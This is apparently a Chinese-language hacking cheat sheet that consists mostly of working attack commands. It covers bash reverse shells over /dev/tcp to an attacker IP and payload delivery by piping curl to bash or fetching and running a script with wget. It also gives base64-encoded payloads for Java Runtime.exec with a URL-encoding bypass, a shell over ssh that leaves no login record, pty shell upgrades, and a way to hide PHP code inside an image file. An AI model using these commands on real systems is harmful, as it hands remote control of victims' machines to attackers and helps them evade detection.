反弹shell
常用反弹shell方式如下(bash/curl/http),其他反弹shell方式参考:Click Here
bash
1
| bash -i >& /dev/tcp/192.168.35.152/7777 0>&1
|
curl
攻击方:
1
2
| cat bash.html
/bin/bash -i >& /dev/tcp/192.168.35.152/7777 0>&1
|
被控端:
1
| curl 192.168.35.152/bash.html|bash
|
http
攻击方:
编写shell脚本并启动http服务器
1
2
3
| echo "bash -i >& /dev/tcp/192.168.35.152/7777 0>&1" > shell.sh
python2环境下:python -m SimpleHTTPServer 80
python3环境下:python -m http.server 80
|
被控端:
1
2
3
4
| # 上传shell.sh文件
wget 192.168.35.152/shell.sh
# 执行shell.sh文件
bash shell.sh
|
java
java.lang.Runtime.exec() Payload:https://www.bugku.net/runtime-exec-payloads/
1
2
| # /bin/bash -i >& /dev/tcp/192.168.35.152/7777 0>&1
bash -c '{echo,L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguMzUuMTUyLzc3NzcgMD4mMSAgIA==}|{base64,-d}|{bash,-i}'
|
URLencode bypass:
1
2
| # /bin/bash -i >& /dev/tcp/192.168.35.152/7777 0>&1
bash -c '{echo,L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguMzUuMTUyLzc3NzcgMD4mMSAgIA%3D%3D}|{base64,-d}|{bash,-i}'
|
ssh无记录shell
1
| ssh -T root@1.1.1.1 /usr/bin/bash -i
|
python交互shell
1
2
3
| python2 -c 'import pty;pty.spawn("/bin/sh")'
python3 -c "import pty;pty.spawn('/bin/bash')"
|
图片马制作
1
| copy 1.jpg/b+1.php/a 2.jpg
|
